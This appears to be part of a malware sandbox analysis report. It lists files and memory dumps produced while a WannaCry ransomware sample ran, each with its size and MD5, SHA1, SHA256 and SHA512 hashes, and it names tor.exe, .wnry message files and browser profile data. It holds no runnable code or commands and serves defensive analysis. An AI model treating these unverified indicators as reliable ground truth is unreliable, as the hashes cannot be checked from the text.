SHA1
08ab20f694457e74eaf1f53c0f219a3c59d5201b

SHA256
327c92555a41006d5f23cacfb2ec24b05c7dfd8dfe8423dca011d60dd69432e8

SHA512
b0a64912af175a886d736f8e5c42ba8a9d7d31b4a1b19737cd57232c25e62a0e0c4ae6ec0543a0db1b715683a447a5ec12752ebc3d027e5355b6bc0f77c8c35c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
314KB

MD5
2d90764cf10fb4d30eabdc75d9c77919

SHA1
97f5092edb7d1473078345989a5eb58b4e612de2

SHA256
e9ffbef23a73b52fe8aee8a4b32bebc267a7781e86e4bd00d06fb924e9c1f8a9

SHA512
78c8aeb95e91f8aaf0c9a826d9a1a65794589e89a7987ed3d04935b0eb4b168be2370bc98b051c0e065bae409d40041bf6268dfb58be067d6a5c71874db48543

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
98KB

MD5
1ecbb0443e59a8b0e4e461980428e922

SHA1
699e82ebe52af851c83328c3a1e2603b99b1c956

SHA256
bf983a40ba508f35032c6207262de3e2b5df81aba1066cfc2e56b17dabc84a0d

SHA512
247446fa027cf98c758260704c78ace4468191cab91b7c9a1c71d51ad3be89e46221f389c1ae8c61f30de3e94ca597181a3f8eeec760602d3048e20da11d921e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
112KB

MD5
1e8aba07d24d24edece27e11a2eb3934

SHA1
215d1a267fd71fcc5e19c4735b46ae843840bdce

SHA256
528c7be25edc385c2059541a8f6b27cd1cb51dc34c104f1c301bcd7a4297de34

SHA512
7de947c0b740c6598b69366e2740acf88f212e5bfbc5a419620247efaf76189c7665ed38accfc2b4fe128fbebf1de4c53d79375189ce5ae0d36482f618157b14

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
113KB

MD5
ae5caca16fb7b8659e0cb80641cccb27

SHA1
db57bae3a0fb6c20112032974feb7dd777af04cf

SHA256
bbdae33a3143f71a8db5a3212ae80b231accf4c7fc62920ac4d5e43ecaa14de1

SHA512
2215fe7531b1bf422f008faa02fd1e106051b9636e1d2d0957363e112fd7604393298a4cab619d4e587fc41eb5b488ee0bccc4ba97be0ae083d2842af1732714

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
111KB

MD5
c6ed2aaa11f631efa307676110512f8b

SHA1
6cd0f5fbac56a687eb483ffa12a5238c57a76ec1

SHA256
a8f32f21c14fbe55a0a8e0854850da6f4ec7c10b3d2f119532ae2f74eb7ed177

SHA512
89f866f694cdab45a431531619812c2dcd66f419ce9bb11833d36ed638246ac5c6e097d9d51d6718fd908ce5788ab90e83d06713736e50cda28d02ee20d9dd1f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
105KB

MD5
97077d03f09b7ea1914971aed33689d8

SHA1
86e9d58b8613fe366c5a6f93a8293f791c38ed87

SHA256
7a3dbff7b3b862e2ad05083835c748caddf8fc8b4fada9f862135d13b813641d

SHA512
d5dffbf02ece33adc262fd4d33121647e02a16bcf31eea9f47e157db04f6397ac52e938d1cb97e8aa19a53c0335a8feede94e3db0a5f1cf2d84bd44f0e2863a1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
114KB

MD5
edbbe49f76f038c18582a3900a3107f7

SHA1
14a637b8e98ff4d7bb71c158096cb5410b52f7f3

SHA256
5ac1c5617d807c1614e5fb58bb502b33ac3cb3a8356685ae997cc1093ea30a12

SHA512
251783e3471cecef6fe2c7304571eb6024ee01472ed4c575f34be0999d896a507e768bbbfabddc008fd1a9b17540ff313f80c6f2e035f624d75f2afed96628e7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe58d193.TMP

Filesize
93KB

MD5
b55da8e83e5666357cff52c800eef53f

SHA1
5ff2123eab729b8b52a3fa71be5c88a2c945da06

SHA256
a4f3cfcd0da7942011f3f0cf88795f32f9e170be42a2d4c7a157606b66e31303

SHA512
e8574c359bd337dfc8d078687587b589b3b3664ba1af214da09a4de8aa39627a59ae95b74f3f7cbb0b8372249970eecc93a64748da081f4fb7682bda26c13035

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

Filesize
264KB

MD5
31cbf6ca03815fc15bf707b93caabcac

SHA1
19c7d88c93f8c6fd4d0098be06ba2af415b62063

SHA256
b247013f4b8fb1ea52cf07278435ac5706349fdc053ca3bb2146a1027225e962

SHA512
2c339198b0d6a848a466fc60fcda5b8105f064b98d2fcdbaec11c4cae116ca40034ca97e67813dee88d02ecba64296f5aff6d1a12743cdaeea825c7a001151d7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
85B

MD5
bc6142469cd7dadf107be9ad87ea4753

SHA1
72a9aa05003fab742b0e4dc4c5d9eda6b9f7565c

SHA256
b26da4f8c7e283aa74386da0229d66af14a37986b8ca828e054fc932f68dd557

SHA512
47d1a67a16f5dc6d50556c5296e65918f0a2fcad0e8cee5795b100fe8cd89eaf5e1fd67691e8a57af3677883a5d8f104723b1901d11845b286474c8ac56f6182

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\5H9X81FA\wikipedia[1].ico

Filesize
2KB

MD5
904ce6bd2ef5e1eaa6de1eb02164436b

SHA1
b37ac89616b9e4c01a35991af59fe6b63e41a48e

SHA256
3638de61226857e62cf5187d7d59cf902111ad4f792b5bdff1bfed3f5ed5e608

SHA512
05044e298742b1520585ae3c029938036ebed50337608a600c4924a29e3624ce704f3b13fbe348d9e1b1e93b1e0abff9f53bbc9fd31929199f9a374f154f74c2

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\MN81MSGK\favicon[1].ico

Filesize
5KB

MD5
f3418a443e7d841097c714d69ec4bcb8

SHA1
49263695f6b0cdd72f45cf1b775e660fdc36c606

SHA256
6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

SHA512
82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\DataStore\Data\nouser1\120712-0049\DBStore\LogFiles\edb.log

Filesize
512KB

MD5
1cf8b47a5be5016a43cb3be31e7b27e3

SHA1
db1d5846f9d6c1d23e481bebeb740b70d5ea7671

SHA256
db7ebfce646789f325e546943066193e4511040b1edc179d5345ad67a38c1575

SHA512
1e1774c2a42ca9485c21a10127ec5410c0b3ca52141c185de407fcdfbe75d4e55c5a58e2e55b044204419abfb48eba25be0b64b69c5a36eccda53f4a51a92b5c

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default\ImageStore\eqfx05v\imagestore.dat

Filesize
8KB

MD5
6d8d2ebf35aaa247925e57ce8b8e866a

SHA1
070e999b72b15e3d68328c9d2d0cb9332ff8c050

SHA256
28772e11c01176edec26407f93d35b38fd56122d7f14bee0bf0b338420858099

SHA512
f5e5a8c29ba3a8093376984511c88d4dfc0deb99230fec7fe45fe0870d651efb8d05f0a3cb9972fdc4bba117406728c140e1adcdadf6e5803018999a2a3e9513

Download Submit
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DF8805753DD3C0F343.TMP

Filesize
16KB

MD5
4dce181b6133afbe48f558dd53d46918

SHA1
c5985f6ecb737775680174461148937b7f4a1f78

SHA256
81430a5bb397f86615b08ea9923b8231e3a90970a1f5842d9815e20c1eb89251

SHA512
d3def7e987a1e2e9b5ebb7ae39a0c6d24b8110c4d2fd162ebdab3c320369cb147e5e03ca110526464ee49ff8cd5a75b672db668e265803d93f7bb8656f41ef53

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
617KB

MD5
88f2d3d629a6184214cfb35a0c157037

SHA1
9ab9790833226da7a7e9dabb597a55e16a104445

SHA256
8be5ed0e13db8c6df90d94b6a0edf4245c34f41f6228a4c9e909ca541116dac2

SHA512
9e7602e0cdd97c76b67e1d3704ad5b86eeea040ad2a38d4a22187c67a89727218c9bda6bdde125b953f135a23585df2d50c067798ceda7983e22c3f4e3740bf4

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry.zip.crdownload

Filesize
3.3MB

MD5
efe76bf09daba2c594d2bc173d9b5cf0

SHA1
ba5de52939cb809eae10fdbb7fac47095a9599a7

SHA256
707a9f323556179571bc832e34fa592066b1d5f2cac4a7426fe163597e3e618a

SHA512
4a1df71925cf2eb49c38f07c6a95bea17752b025f0114c6fd81bc0841c1d1f2965b5dda1469e454b9e8207c2e0dfd3df0959e57166620ccff86eeeb5cf855029

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]

Filesize
933B

MD5
7e6b6da7c61fcb66f3f30166871def5b

SHA1
00f699cf9bbc0308f6e101283eca15a7c566d4f9

SHA256
4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e

SHA512
e5a56137f325904e0c7de1d0df38745f733652214f0cdb6ef173fa0743a334f95bed274df79469e270c9208e6bdc2e6251ef0cdd81af20fa1897929663e2c7d3

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\TaskData\Tor\tor.exe

Filesize
3.0MB

MD5
fe7eb54691ad6e6af77f8a9a0b6de26d

SHA1
53912d33bec3375153b7e4e68b78d66dab62671a

SHA256
e48673680746fbe027e8982f62a83c298d6fb46ad9243de8e79b7e5a24dcd4eb

SHA512
8ac6dc5bb016afc869fcbb713f6a14d3692e866b94f4f1ee83b09a7506a8cb58768bd47e081cf6e97b2dacf9f9a6a8ca240d7d20d0b67dbd33238cc861deae8f

Download Submit
C:\Users\Admin\Downloads\Ransomware.WannaCry\msg\m_finnish.wnry

Filesize
37KB

MD5
35c2f97eea8819b1caebd23fee732d8f

SHA1
e354d1cc43d6a39d9732adea5d3b0f57284255d2

SHA256
1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e

SHA512
908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

Download Submit
C:\Users\Default\Desktop\@[email protected]

Filesize
1.4MB

MD5
c17170262312f3be7027bc2ca825bf0c

SHA1
f19eceda82973239a1fdc5826bce7691e5dcb4fb

SHA256
d5e0e8694ddc0548d8e6b87c83d50f4ab85c1debadb106d6a6a794c3e746f4fa

SHA512
c6160fd03ad659c8dd9cf2a83f9fdcd34f2db4f8f27f33c5afd52aced49dfa9ce4909211c221a0479dbbb6e6c985385557c495fc04d3400ff21a0fbbae42ee7c

Download Submit
\??\pipe\crashpad_4536_DHAQNCQDGWLGPRJD

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1528-685-0x00007FF6F8BD0000-0x00007FF6FCF3D000-memory.dmp

Filesize
67.4MB

Download
memory/2856-102-0x000002D6781D0000-0x000002D6781D2000-memory.dmp

Filesize
8KB

Download
memory/2856-129-0x000002D676680000-0x000002D676682000-memory.dmp

Filesize
8KB

Download
memory/2856-92-0x000002D676490000-0x000002D676492000-memory.dmp

Filesize
8KB

Download
memory/2856-100-0x000002D677FF0000-0x000002D677FF2000-memory.dmp

Filesize
8KB

Download
memory/2856-98-0x000002D6764F0000-0x000002D6764F2000-memory.dmp

Filesize
8KB

Download
memory/2856-94-0x000002D6764B0000-0x000002D6764B2000-memory.dmp

Filesize
8KB

Download
memory/2856-78-0x000002D676920000-0x000002D676940000-memory.dmp

Filesize
128KB

Download
memory/2856-88-0x000002D676450000-0x000002D676452000-memory.dmp

Filesize
8KB

Download
memory/2856-70-0x000002CE734E0000-0x000002CE735E0000-memory.dmp

Filesize
1024KB

Download
memory/2856-90-0x000002D676470000-0x000002D676472000-memory.dmp

Filesize
8KB

Download
memory/2856-86-0x000002D676440000-0x000002D676442000-memory.dmp

Filesize
8KB

Download
memory/2856-106-0x000002D678FA0000-0x000002D678FC0000-memory.dmp

Filesize
128KB

Download
memory/2856-84-0x000002D676280000-0x000002D676282000-memory.dmp

Filesize
8KB

Download
memory/2872-2063-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/3452-3330-0x00000000008D0000-0x0000000000BCE000-memory.dmp

Filesize
3.0MB

Download
memory/3452-3336-0x0000000073530000-0x00000000735B2000-memory.dmp

Filesize
520KB

Download
memory/3452-3327-0x00000000731B0000-0x00000000733CC000-memory.dmp

Filesize
2.1MB

Download
memory/3452-3326-0x0000000073530000-0x00000000735B2000-memory.dmp

Filesize
520KB

Download
memory/3452-3329-0x00000000733D0000-0x00000000733F2000-memory.dmp

Filesize
136KB

Download
memory/3452-3328-0x0000000073400000-0x0000000073482000-memory.dmp

Filesize
520KB

Download
memory/3868-45-0x0000016F32B00000-0x0000016F32C00000-memory.dmp

Filesize
1024KB

Download
memory/4524-35-0x0000020981040000-0x0000020981042000-memory.dmp

Filesize
8KB

Download
memory/4524-149-0x000002098A340000-0x000002098A341000-memory.dmp

Filesize
4KB

Download
memory/4524-0-0x0000020983C20000-0x0000020983C30000-memory.dmp

Filesize
64KB

Download
memory/4524-150-0x000002098A350000-0x000002098A351000-memory.dmp

Filesize
4KB

Download
memory/4524-236-0x00000209810D0000-0x00000209810D2000-memory.dmp

Filesize
8KB

Download
memory/4524-239-0x0000020981070000-0x0000020981071000-memory.dmp

Filesize
4KB

Download
memory/4524-243-0x0000020981030000-0x0000020981031000-memory.dmp

Filesize
4KB

Download
memory/4524-16-0x0000020983D20000-0x0000020983D30000-memory.dmp

Filesize
64KB

Download